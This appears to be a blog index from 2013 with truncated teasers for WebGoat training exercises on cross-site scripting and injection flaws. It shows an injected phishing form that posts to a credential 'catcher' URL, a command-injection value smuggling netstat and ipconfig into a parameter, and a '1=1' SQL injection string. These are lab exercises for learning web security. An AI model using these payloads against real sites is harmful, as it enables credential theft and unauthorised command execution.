Cross-Site Scripting

April 19, 2013

Phishing with XSS

</form><form action="http://127.0.0.1:8888/webgoat/catcher?PROPERTY=yes" method="post"><br>&......

XSS webgoat

Injection Flaws

April 19, 2013

1. Command InjectionHelpFile=AccessControlMatrix.help" %26 netstat -an %26 ipconfig"

2. Numeric SQL Injection101 oR 1=1

3. Log Spoofing......

注入 webgoat